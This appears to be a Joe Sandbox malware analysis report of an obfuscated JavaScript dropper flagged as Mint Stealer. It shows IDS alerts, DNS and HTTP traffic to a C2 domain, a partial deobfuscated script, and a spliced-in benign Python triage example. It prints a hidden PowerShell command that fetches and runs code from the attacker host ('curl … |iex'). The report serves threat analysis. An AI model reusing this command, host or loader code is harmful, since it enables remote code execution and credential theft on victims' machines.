                                                                                                            Malicious:false
                                                                                                            Preview:...................................FL..................F.".. ......Yd....'..)k..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd....d..)k...u,.)k......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B4Z.V..........................d...A.p.p.D.a.t.a...B.V.1.....4Z.V..Roaming.@......EW)B4Z.V..........................?...R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)B4Z.V............................ .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B4Z.V..............................W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B4Z.V....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B4Z.V....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)B4Z.V.....0..........
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):6222
                                                                                                            Entropy (8bit):3.731333292207573
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:KxyDdCRP8aKkvhkvCCtCMKgQCHEofYKgQHHEofr:K0D0PCCMKOwK1T
                                                                                                            MD5:EB513B8049AA7E3D8E0050E2EE4FA5C4
                                                                                                            SHA1:F97FB07462A2D9A8269937C55AE8E2AD7DA690FF
                                                                                                            SHA-256:30A421AE35AC64892106EF584FFBCA202FDA039C8DF1C2248E0D5954D43FB4B5
                                                                                                            SHA-512:BD3FA57EEDD1D3829FE5CAF42167CAB67F38C06CE683936E7BA08DAB3E0AB71C42830211973EF2556B5BE66C7DAF6D3FE229E89CF17307A2007EF7BA51692A6A
                                                                                                            Malicious:false
                                                                                                            Preview:...................................FL..................F.".. ......Yd....'..)k..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd....d..)k...u,.)k......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B4Z.V..........................d...A.p.p.D.a.t.a...B.V.1.....4Z.V..Roaming.@......EW)B4Z.V..........................?...R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)B4Z.V............................ .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B4Z.V..............................W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B4Z.V....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B4Z.V....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)B4Z.V.....0..........
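Triaging the dropped-file list above, as an added example that is not part of the Joe Sandbox report: the script parses the report's key:value blocks (DROPPED is constructed input reproducing the five entries' process, type, size, SHA-256 and a shortened preview; the report shows no file paths and none are assumed), collapses duplicates by hash, and labels the files powershell.exe writes on its own at startup. The "# PowerShell test file to determine AppLocker lockdown mode" content is the AppLocker probe that powershell.exe drops into the user's temp directory as __PSScriptPolicyTest_<random>.ps1; the other labels are heuristics of this example, not verdicts from the report.

```python
"""Dedupe a sandbox dropped-file listing and separate PowerShell host artifacts
from anything the sample itself wrote.

Added example, not part of the Joe Sandbox report. DROPPED is constructed
key:value input built from the report's five entries (previews shortened).
"""
import re

DROPPED = r"""
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Size (bytes):64
SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
Malicious:false
Preview:@...e................................................@..........

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Size (bytes):60
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Size (bytes):60
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Size (bytes):6222
SHA-256:30A421AE35AC64892106EF584FFBCA202FDA039C8DF1C2248E0D5954D43FB4B5
Malicious:false
Preview:...CFSF..1.....EW)B..AppData...Roaming...MICROS~1...Windows...STARTM~1...Programs...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....WINDOW~1.LNK...

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Size (bytes):6222
SHA-256:30A421AE35AC64892106EF584FFBCA202FDA039C8DF1C2248E0D5954D43FB4B5
Malicious:false
Preview:...CFSF..1.....EW)B..AppData...Roaming...MICROS~1...Windows...STARTM~1...Programs...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....WINDOW~1.LNK...
"""

# Content of the __PSScriptPolicyTest_<random>.ps1 probe powershell.exe writes at startup
PS_PROBE = "# PowerShell test file to determine AppLocker lockdown mode"


def parse_dropped(text: str) -> list[dict]:
    """Split the report's key:value listing into one dict per dropped file."""
    entries = []
    for block in re.split(r"\n\s*\n", text.strip()):
        entry = {}
        for line in block.splitlines():
            key, _, value = line.partition(":")  # first colon only: paths contain "C:\"
            entry[key.strip()] = value.strip()
        entries.append(entry)
    return entries


def classify(entry: dict) -> str:
    """Heuristic labels (assumptions of this example), derived from file content."""
    preview = entry.get("Preview", "")
    if entry["Process"].lower().endswith("powershell.exe"):
        if preview.startswith(PS_PROBE):
            return "powershell startup AppLocker probe (host artifact)"
        if "W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l" in preview and ".LNK" in preview:
            return "shell item list for the Windows PowerShell Start Menu shortcut (host artifact)"
    return "unclassified: review manually"


def unique_drops(text: str) -> dict[str, dict]:
    """Collapse duplicate entries by SHA-256, keeping a count and a label per hash."""
    out: dict[str, dict] = {}
    for e in parse_dropped(text):
        h = e["SHA-256"].lower()
        if h not in out:
            out[h] = {"size": int(e["Size (bytes)"]), "process": e["Process"],
                      "label": classify(e), "count": 0}
        out[h]["count"] += 1
    return out


def needs_review(text: str) -> list[str]:
    """Hashes that no host-artifact rule explained: the only ones worth pulling."""
    return [h for h, d in unique_drops(text).items() if d["label"].startswith("unclassified")]


if __name__ == "__main__":
    for h, d in unique_drops(DROPPED).items():
        print(f"{h[:16]}... x{d['count']} {d['size']:>5} B  {d['label']}")
    print("review:", needs_review(DROPPED))
```

Five entries collapse to three hashes, and only the 64-byte `data` file is left without an explanation; the two probe files and the two shell item lists are produced by the two PowerShell processes themselves, which is why the report rates them "very likely benign".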
                                                                                                            File type:ASCII text, with very long lines (550)
                                                                                                            Entropy (8bit):4.427726407381041
                                                                                                            TrID:
                                                                                                            • Digital Micrograph Script (4001/1) 100.00%
                                                                                                            File name:FM5vWQHpqe.js
                                                                                                            File size:389'749 bytes
                                                                                                            MD5:c1c0e16fc76c9da7873958c89c59416d
                                                                                                            SHA1:c66661696fa8bdc6576c4b47a106a0c32518b2b9
                                                                                                            SHA256:24c03cb37e48b5810f40fdd69acb290d67dbfd003bef5c21cf23b1d210a0faa1
                                                                                                            SHA512:e4168c334b452a1b0e4c7419d56c21732388bc59166619e57e3ce823442a271b9fd80cddcd13ad806348c5ac6a19c15267c1b11d488b6a75b0b2671ca695f86e
                                                                                                            SSDEEP:3072:SX6m9v6CVX6m9v6JKcfQ6m9v/KXKRHKt6m9vJ6m9v5YXp6m9v5k6m9vs/K1YRXEv:t
                                                                                                            TLSH:AF848566A1B139366C419381BF4149F3A6FDC417521F1BA6ACAE472C060F4B9937EC3E
                                                                                                            File Content Preview:// carmen juniper inculpation solerets larrikins subdwarf iridosmines logicises rumpuses spurner eyesights rheumiest hydrate polyelectrolyte superior vacancy redargued crocine knockwurst flossed ninebarks redream tsk hypoxemic trichromats fetors cardiae./
                                                                                                            Icon Hash:68d69b8bb6aa9a86
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-20T11:55:51.369979+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 2 | 192.168.2.8 | 49705 | 206.188.196.219 | 80 | TCP
2025-01-20T11:55:51.369979+0100 | 2057063 | ET MALWARE Mints.Loader CnC Activity (GET) | 1 | 192.168.2.8 | 49705 | 206.188.196.219 | 80 | TCP
2025-01-20T11:55:51.369979+0100 | 2057743 | ET MALWARE TA582 CnC Checkin | 1 | 192.168.2.8 | 49705 | 206.188.196.219 | 80 | TCP
2025-01-20T11:55:52.016079+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 2 | 192.168.2.8 | 49706 | 142.250.185.68 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 20, 2025 11:55:50.168929100 CET | 49705 | 80 | 192.168.2.8 | 206.188.196.219
Jan 20, 2025 11:55:50.361489058 CET | 80 | 49705 | 206.188.196.219 | 192.168.2.8
Jan 20, 2025 11:55:50.361864090 CET | 49705 | 80 | 192.168.2.8 | 206.188.196.219
Jan 20, 2025 11:55:50.365710020 CET | 49705 | 80 | 192.168.2.8 | 206.188.196.219
Jan 20, 2025 11:55:50.370445013 CET | 80 | 49705 | 206.188.196.219 | 192.168.2.8
Jan 20, 2025 11:55:51.310861111 CET | 80 | 49705 | 206.188.196.219 | 192.168.2.8
Jan 20, 2025 11:55:51.324671984 CET | 49706 | 80 | 192.168.2.8 | 142.250.185.68
Jan 20, 2025 11:55:51.329440117 CET | 80 | 49706 | 142.250.185.68 | 192.168.2.8
Jan 20, 2025 11:55:51.329524994 CET | 49706 | 80 | 192.168.2.8 | 142.250.185.68
Jan 20, 2025 11:55:51.329731941 CET | 49706 | 80 | 192.168.2.8 | 142.250.185.68
Jan 20, 2025 11:55:51.334479094 CET | 80 | 49706 | 142.250.185.68 | 192.168.2.8
Jan 20, 2025 11:55:51.369978905 CET | 49705 | 80 | 192.168.2.8 | 206.188.196.219
Jan 20, 2025 11:55:52.015919924 CET | 80 | 49706 | 142.250.185.68 | 192.168.2.8
Jan 20, 2025 11:55:52.015945911 CET | 80 | 49706 | 142.250.185.68 | 192.168.2.8
Jan 20, 2025 11:55:52.015957117 CET | 80 | 49706 | 142.250.185.68 | 192.168.2.8
Jan 20, 2025 11:55:52.015968084 CET | 80 | 49706 | 142.250.185.68 | 192.168.2.8
Jan 20, 2025 11:55:52.015980959 CET | 80 | 49706 | 142.250.185.68 | 192.168.2.8
Jan 20, 2025 11:55:52.015990973 CET | 80 | 49706 | 142.250.185.68 | 192.168.2.8
Jan 20, 2025 11:55:52.016004086 CET | 80 | 49706 | 142.250.185.68 | 192.168.2.8
Jan 20, 2025 11:55:52.016015053 CET | 80 | 49706 | 142.250.185.68 | 192.168.2.8
Jan 20, 2025 11:55:52.016025066 CET | 80 | 49706 | 142.250.185.68 | 192.168.2.8
Jan 20, 2025 11:55:52.016036987 CET | 80 | 49706 | 142.250.185.68 | 192.168.2.8
Jan 20, 2025 11:55:52.016078949 CET | 49706 | 80 | 192.168.2.8 | 142.250.185.68
Jan 20, 2025 11:55:52.016129971 CET | 49706 | 80 | 192.168.2.8 | 142.250.185.68
Jan 20, 2025 11:55:52.020988941 CET | 80 | 49706 | 142.250.185.68 | 192.168.2.8
Jan 20, 2025 11:55:52.021003962 CET | 80 | 49706 | 142.250.185.68 | 192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.021014929 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.021075964 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.068392038 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.104273081 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.104335070 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.104372978 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.104415894 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.104698896 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.104732990 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.104753971 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.104765892 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.104815960 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.110992908 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.111028910 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.111047029 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.111223936 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.117429018 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.117464066 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.117495060 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.117530107 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.117573023 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.123639107 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.123672962 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.123704910 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.123756886 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.129817963 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.129848003 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.129919052 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.129921913 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.129947901 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.129975080 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.136046886 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.136081934 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.136110067 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.136115074 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.136156082 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.142273903 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.142307043 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.142338991 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.142369986 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.148504972 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.148536921 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.148562908 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.148570061 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.148603916 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.154802084 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.154834986 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.154877901 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.154887915 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.154916048 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.154967070 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.192637920 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.192672014 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.192688942 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.192699909 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.192711115 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.192719936 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.192748070 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.196789980 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.196800947 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.196835041 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.196966887 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.196976900 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.197005987 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.203063965 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.203083992 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.203094959 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.203119993 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.203142881 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.209332943 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.209374905 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.209387064 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.209418058 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.215543032 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.215567112 CET8049706142.250.185.68192.168.2.8
                                                                                                            Jan 20, 2025 11:55:52.215588093 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.255825043 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.586677074 CET4970680192.168.2.8142.250.185.68
                                                                                                            Jan 20, 2025 11:55:52.586757898 CET4970580192.168.2.8206.188.196.219
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Jan 20, 2025 11:55:50.133960962 CET  54059        53         192.168.2.8  1.1.1.1
Jan 20, 2025 11:55:50.154297113 CET  53           54059      1.1.1.1      192.168.2.8
Jan 20, 2025 11:55:51.312858105 CET  52700        53         192.168.2.8  1.1.1.1
Jan 20, 2025 11:55:51.319530964 CET  53           52700      1.1.1.1      192.168.2.8
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name              Type            Class        DNS over HTTPS
Jan 20, 2025 11:55:50.133960962 CET  192.168.2.8  1.1.1.1  0xb848    Standard query (0)  nzy3tvbb72g3.top  A (IP address)  IN (0x0001)  false
Jan 20, 2025 11:55:51.312858105 CET  192.168.2.8  1.1.1.1  0xf9d8    Standard query (0)  www.google.com    A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name              CName  Address          Type            Class        DNS over HTTPS
Jan 20, 2025 11:55:50.154297113 CET  1.1.1.1    192.168.2.8  0xb848    No error (0)  nzy3tvbb72g3.top  -      206.188.196.219  A (IP address)  IN (0x0001)  false
Jan 20, 2025 11:55:51.319530964 CET  1.1.1.1    192.168.2.8  0xf9d8    No error (0)  www.google.com    -      142.250.185.68   A (IP address)  IN (0x0001)  false
• nzy3tvbb72g3.top
• www.google.com
Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
0           192.168.2.8  49705        206.188.196.219  80                7580  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp                            Bytes transferred  Direction  Data
Jan 20, 2025 11:55:50.365710020 CET  176                OUT
GET /1.php?s=mints13 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: nzy3tvbb72g3.top
Connection: Keep-Alive

Jan 20, 2025 11:55:51.310861111 CET  166                IN
HTTP/1.1 302 Found
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 20 Jan 2025 10:55:51 GMT
Content-Length: 0
Connection: keep-alive
Location: http://www.google.com


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.8  49706        142.250.185.68  80                7580  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp                            Bytes transferred  Direction  Data
Jan 20, 2025 11:55:51.329731941 CET  159                OUT
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: www.google.com
Connection: Keep-Alive

Jan 20, 2025 11:55:52.015919924 CET  1236               IN
HTTP/1.1 200 OK
Date: Mon, 20 Jan 2025 10:55:51 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-JLDd7Tyb9tGXqIsL63X3LA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AZ6Zc-V9nWsmsmi2L5bsFNriJhEw3XjfRhl71bBWS2d6BUXh-AkYZFb9_-8; expires=Sat, 19-Jul-2025 10:55:51 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Set-Cookie: NID=520=lN2T2YOuyZkMCmZ3kBqmaBiGzQyKRAYjWByPc1Tt1iSJ_2_6rk5zX0Wm-n6w5fvmKDOu9HSGIl68BA1GvmPOl6Zj8n7sYovdD-uoCPFhFUyFLzuDij2E572fBnc3JknayITrT8z1E5NjczAX6k1OFK5mNPbAZ_9QpNuQkiJKEqWLgjnBpZI93tQKXKwtwl6m6mK8fd5ogCyJnP-lvg; expires=Tue, 22-Jul-2025 10:55:51 GMT; path=/; domain=.google.com; HttpOnly
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked



Target ID: 0
Start time: 05:55:40
Start date: 20/01/2025
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FM5vWQHpqe.js"
Imagebase: 0x7ff7efef0000
File size: 170'496 bytes
MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_MintStealer_1, Description: Yara detected Mint Stealer, Source: 00000000.00000003.1499672307.0000023BD7F16000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MintStealer_1, Description: Yara detected Mint Stealer, Source: 00000000.00000003.1500335199.0000023BD7F16000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MintStealer_1, Description: Yara detected Mint Stealer, Source: 00000000.00000003.1500163574.0000023BD7F16000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MintStealer_1, Description: Yara detected Mint Stealer, Source: 00000000.00000003.1499012379.0000023BD7E29000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MintStealer_1, Description: Yara detected Mint Stealer, Source: 00000000.00000003.1497822366.0000023BD9C3B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MintStealer_1, Description: Yara detected Mint Stealer, Source: 00000000.00000003.1500383727.0000023BD7F16000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MintStealer_1, Description: Yara detected Mint Stealer, Source: 00000000.00000002.1506269104.0000023BD7F16000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: true

Target ID: 2
Start time: 05:55:46
Start date: 20/01/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex"
Imagebase: 0x7ff6cb6b0000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 05:55:46
Start date: 20/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6ee680000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Call Graph

• Executed
• Not Executed
[Call graph figure; only the call relations recoverable from the rendered text are kept] entry calls: Sleep; ExpandEnvironmentStrings and Run (methods of the ActiveXObject() instance); an anonymous function that calls fromCharCode; sh25wWm2Gmp2, which calls split, push and fromCharCode; KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOg7uAlKgc, which calls push; replace; apply; fromCharCode (twice); CreateObject; DeleteFile. A second anonymous function calling fromCharCode is present but not connected to the entry point.

                                                                                                            Script:

Code
WScript.Sleep ( 6000 );
  • Windows Script Host.Sleep(6000) ➔ undefined
var NIpmPnmVeEUJU3hU04U99bCJn5t9yNNVt1yrVPH1flwBB77Qs0r2RXyheLi1zCa6RMkPOPOsrM = [ 60 + 60 + 0x2, 50 + 50 + 50 + 16, 50 + 0x2 * 0x4, 32 + 16 * 0x2, 150 * 0x2 + 65, 0x4 * 4, 100 + 25 + 110, 0x5 * 11 ];
var KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOg7uAlKgcar = [ 0xf1 + 0xa, 0xd5 + 0xa, 0xc5 + 0xa, 0xd4 + 0xa, 0xcf + 0xa, 0xd6 + 0xa, 0xd2 + 0xa, 0x88 + 0xa, 0xf5 + 0xa, 0xce + 0xa, 0xc3 + 0xa, 0xca + 0xa, 0xca + 0xa ];
var KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsO = new ActiveXObject (
    function () {
      • () ➔ "Wscript.Shell"
      • () ➔ "Wscript.Shell"
        var KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsO12sfr = '';
        var KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOIld = 0;
        while (KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOIld < KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOg7uAlKgcar.length )
        {
            KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsO12sfr += String.fromCharCode ( ( KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOg7uAlKgcar[KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOIld] - 0xa ) ^ NIpmPnmVeEUJU3hU04U99bCJn5t9yNNVt1yrVPH1flwBB77Qs0r2RXyheLi1zCa6RMkPOPOsrM[1] );
